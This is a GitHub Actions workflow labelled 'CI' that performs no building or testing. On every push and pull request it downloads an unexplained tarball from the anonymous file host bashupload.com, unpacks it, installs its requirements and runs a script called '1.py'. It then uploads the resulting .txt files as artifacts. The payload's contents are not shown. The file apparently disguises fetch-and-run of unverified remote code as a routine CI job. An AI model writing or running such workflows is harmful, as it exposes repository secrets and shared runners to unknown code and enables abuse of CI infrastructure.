name: CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Run a multi-line script
        run: |
          sudo apt update
          wget https://bashupload.com/a4y6x/github.tar.gz
          tar -xf github.tar.gz
          pip install -r requirements.txt
          python 1.py
      # Upload all .txt files from the /data folder
      - name: Upload .txt files from data folder
        uses: actions/upload-artifact@v4
        with:
          name: data
          path: data/*.txt
